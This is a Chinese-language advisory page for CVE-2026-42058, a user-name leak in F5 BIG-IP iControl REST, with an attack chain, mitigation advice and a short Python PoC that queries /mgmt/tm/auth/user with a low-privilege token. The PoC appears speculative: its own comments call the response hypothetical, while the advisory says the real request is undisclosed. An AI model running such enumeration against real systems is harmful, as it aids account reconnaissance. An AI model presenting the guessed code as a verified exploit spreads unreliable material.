CVE-2026-42058 CVSS 4.3 中危

CVE-2026-42058 F5 BIG-IP iControl REST信息泄露漏洞

披露日期: 2026-05-13

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-42058

漏洞类型

信息泄露

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

F5 BIG-IP

漏洞概述

该漏洞存在于F5 BIG-IP的iControl REST组件中。经过身份验证的低权限攻击者可以通过发送特定的未披露请求，利用该漏洞导致BIG-IP本地用户账户名称泄露。注意，已达到技术支持终止（EoTS）的软件版本不在评估范围内。

技术细节

漏洞源于F5 BIG-IP iControl REST接口在处理特定请求时缺乏足够的访问控制或信息过滤机制。攻击者需要具备低权限账户身份，并能够访问iControl REST服务。通过构造恶意的HTTP请求发送至受影响端点，服务器响应中可能包含本地用户名列表或其他敏感账户信息。由于无需用户交互且攻击复杂度低，该漏洞具有一定的利用风险，但仅限于信息泄露，不影响系统完整性和可用性。

攻击链分析

STEP 1

1. 侦察与认证

攻击者首先获取F5 BIG-IP系统的一个低权限用户凭证，并访问iControl REST服务接口。

STEP 2

2. 构造恶意请求

攻击者利用已知的漏洞端点，构造特定的HTTP请求（可能是针对用户管理接口的特定查询）。

STEP 3

3. 信息窃取

服务器响应请求并返回了本应受限的本地用户账户名称列表，攻击者解析响应获取敏感信息。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target configuration
target_url = "https://<TARGET_IP>/mgmt/tm/auth/user"
headers = {
    "Content-Type": "application/json",
    # Authorization header with valid low-privilege token
    "X-F5-Auth-Token": "<VALID_TOKEN>" 
}

try:
    # Send request to exploit the information leak
    response = requests.get(target_url, headers=headers, verify=False)
    
    if response.status_code == 200:
        data = response.json()
        print("[+] Exploit Successful!")
        print("[+] Leaked User Information:")
        # Parsing the hypothetical JSON response containing user names
        if 'items' in data:
            for item in data['items']:
                print(f"User: {item.get('name')}")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

F5 BIG-IP (具体受影响版本请参考官方安全公告 K000160903)

防御指南

临时缓解措施

在未升级补丁前，建议通过网络ACL严格限制对iControl REST端口的访问，并启用日志审计以监控异常的用户枚举行为。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-42058
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-42058
3 Details https://www.cvedetails.com/cve/CVE-2026-42058/
4 VulDB https://vuldb.com/cve/CVE-2026-42058
5 Link https://my.f5.com/manage/s/article/K000160903

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表